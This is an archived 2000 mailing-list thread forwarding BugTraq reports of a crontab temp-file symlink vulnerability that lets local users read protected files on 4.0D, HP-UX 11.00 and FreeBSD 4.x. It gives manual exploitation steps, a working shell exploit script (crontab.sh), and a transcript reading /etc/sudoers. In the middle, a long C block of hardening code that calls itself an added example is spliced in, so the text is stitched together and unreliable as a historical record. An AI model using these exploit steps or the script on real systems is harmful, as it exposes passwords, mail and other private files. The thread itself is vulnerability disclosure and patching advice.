BugTraq exploit to use crontab to read any file on 4.0D

From: Ann Cantelow <cantelow_at_atlas.csd.net>
Date: Thu, 26 Oct 2000 12:58:26 -0600 (MDT)

Hi. There's a new vulnerability coming out of BugTraq that it seems to me
people would want to know about. On 4.0D, but not 4.0G, you can read any
file on the system, including mailboxes and files storing passwords,
anything in ascii format, possibly more. All you need is a login and
access to the crontab command.

What you can do is this:

  edit your crontab: crontab -e
  note the name of the temp file- /tmp/aaaa(something)
  escape from vi to shell: :!sh
  remove the temp file, and replace it with a soft link to the file you
    want to read.
  return to your crontab vi session, and attempt to file it.
  crontab returns the contents of the file to screen, interspersed with
    error messages about invalid format (your own crontab remains intact).

For 4.0G, the problem wasn't there because crontab only gives you a
message that contents are invalid, and doesn't display the lines.

Below is the original BugTraq message about the vulnerability and
one of the posts answering it. Hope this helps. BTW, we found a
temporary solution by copying a 4.0G crontab program file to our 4.0D
machine. We'll also upgrade the 4.0D machine soon!

Ann Cantelow
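The two defences this thread contrasts, written out in C as an added example (not code from this thread, from HP, Compaq/Digital or FreeBSD, nor from any real crontab): 4.0G's behaviour of reporting a bad line without displaying it, and the more fundamental fix of not trusting the temp file path once an external editor has had a chance to run. It assumes a writable /tmp and POSIX mkstemp()/O_NOFOLLOW; the file names, the struct and function names (tmp_identity, create_temp, reopen_verified, first_bad_line, demo_reopen) and the "secret" stand-in file are all constructed for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE               /* O_NOFOLLOW, mkstemp, symlink */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Identity of the scratch file as created, recorded before $EDITOR runs. */
struct tmp_identity { dev_t dev; ino_t ino; uid_t uid; };

/* Create the scratch file a hardened crontab -e hands to the editor.
 * mkstemp() opens with O_EXCL, so this is a fresh regular file of ours;
 * remember device/inode/owner so it can be recognised afterwards. */
int create_temp(char *path_out, size_t len, struct tmp_identity *id)
{
    char tmpl[] = "/tmp/crontab.XXXXXX";
    struct stat st;
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0) { close(fd); unlink(tmpl); return -1; }
    id->dev = st.st_dev; id->ino = st.st_ino; id->uid = st.st_uid;
    close(fd);
    snprintf(path_out, len, "%s", tmpl);
    return 0;
}

/* Re-open after the editor returns.  O_NOFOLLOW makes open() refuse a
 * symlink outright; comparing dev/ino/uid catches a file that was unlinked
 * and replaced by anything else.  Returns an fd, or -1 on rejection. */
int reopen_verified(const char *path, const struct tmp_identity *id)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_dev != id->dev ||
        st.st_ino != id->ino || st.st_uid != id->uid) { close(fd); return -1; }
    return fd;
}

/* Validate without echoing: an entry needs five time fields plus a command.
 * Returns 0 if every non-blank, non-comment line qualifies, else the 1-based
 * number of the first bad line; the caller reports that number only, so
 * file content never reaches the error output (the 4.0G behaviour above). */
int first_bad_line(FILE *fp)
{
    char buf[1024];
    int lineno = 0;
    while (fgets(buf, sizeof buf, fp)) {
        int fields = 0;
        char *tok = strtok(buf, " \t\n");
        lineno++;
        if (tok == NULL || tok[0] == '#') continue;   /* blank or comment */
        for (; tok != NULL; tok = strtok(NULL, " \t\n")) fields++;
        if (fields < 6) return lineno;
    }
    return 0;
}

/* Same check on an in-memory text, via tmpfile(). */
int first_bad_line_of(const char *text)
{
    FILE *fp = tmpfile();
    int bad;
    if (fp == NULL) return -1;
    fputs(text, fp);
    rewind(fp);
    bad = first_bad_line(fp);
    fclose(fp);
    return bad;
}

/* Exercise the hardened reopen.  With swap == 1 it reproduces the thread's
 * scenario: while the editor is "open", the scratch file is replaced by a
 * symlink to a file the user may not read (a constructed stand-in here).
 * Returns 1 if the scratch file was accepted, 0 if rejected, -1 on error. */
int demo_reopen(int swap)
{
    char path[64], target[] = "/tmp/secret.XXXXXX";
    struct tmp_identity id;
    FILE *fp;
    int fd, tfd = mkstemp(target);
    if (tfd < 0) return -1;
    close(tfd);
    if (create_temp(path, sizeof path, &id) < 0) { unlink(target); return -1; }
    if (swap) {                        /* the swap made from the shell escape */
        unlink(path);
        if (symlink(target, path) < 0) { unlink(target); return -1; }
    } else if ((fp = fopen(path, "w")) != NULL) {   /* editor saves in place */
        fputs("# constructed crontab\n0 3 * * * /usr/bin/true\n", fp);
        fclose(fp);
    }
    fd = reopen_verified(path, &id);
    if (fd >= 0) close(fd);
    unlink(path);
    unlink(target);
    return fd >= 0;
}
```

Calling demo_reopen(1) returns 0 (the symlink is refused before a byte is read), demo_reopen(0) returns 1, and first_bad_line_of() on a sudoers-style text returns the number of the first non-comment line rather than its contents. Note that the dev/ino comparison matters even on systems with O_NOFOLLOW: an editor that saves by writing a new file and renaming it over the old one will also change the inode, so a crontab that wants to support such editors has to decide whether to accept a fresh file that is still a regular file owned by the same user, which is exactly the check that lets comment-leading files slip through on the FreeBSD versions reported below.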

-----------------------------------------
Date: Tue Oct 24 2000 10:03:04
Author: Kyong-won Cho < dubhe_at_hackerslab.com >
Message-ID: <003101c03d56$2a064670$071bebcb_at_swat.hackerslab.com>

 [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability

Attach

====================== crontab.sh ================================

#!/bin/sh
#
# HP-UX 11.00 crontab
#
# Kyong-won,Cho
#
# dubhe_at_hackerslab.com
#
# Usage : ./crontab.sh <distfile>
#
#

if [ -z "$1" ]
then

echo "Usage : $0 <distfile>"
exit

fi

cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh

ln -sf $1 \$1

_EOF_

chmod 755 /tmp/crontab_exp

EDITOR=/tmp/crontab_exp
export EDITOR

crontab -e 2> /tmp/crontab$$

grep -v "error on previous line" /tmp/crontab$$

rm -f /tmp/crontab_exp /tmp/crontab$$


==================================================end


---------- Forwarded message ----------
Date: Tue, 24 Oct 2000 20:55:29 +0400
From: Sergey Nenashev <alf_at_ISD.MEMONET.RU>
To: BUGTRAQ_at_SECURITYFOCUS.COM
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
        symboliclink vulnerability

Hi,

Tested on
4.0-RELEASE FreeBSD 4.0-RELEASE #9
4.1-RELEASE FreeBSD 4.1-RELEASE #1:


Can read any file which starts with the comment symbol (#)



$ ls -l /etc/sudoers
-r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
$ id
uid=1002(alf) gid=1002(alf) groups=1002(alf)


$ crontab -e
~
~
~
/tmp/crontab.hLmjTbK417
:!sh

[ #### Make symbolic link]
> rm /tmp/crontab.hLmjTbK417
> ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> exit

[ #### quit vi ]
/tmp/crontab.hLmjTbK417
crontab: installing new crontab

[ #### start crontab editor]

$ crontab -e
[####### See in vi]
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL) ALL
alf ALL=(ALL) ALL
~
~
~




If the file started with no # then crontab said

"/tmp/crontab.GAeNMP1357":2: bad minute
crontab: errors in crontab file, can't install




--
------
Alf Delems<alf_at_isd.memonet.ru>
Received on Thu Oct 26 2000 - 18:59:23 NZDT

This archive was generated by hypermail 2.4.0 : Wed Nov 08 2023 - 11:53:41 NZDT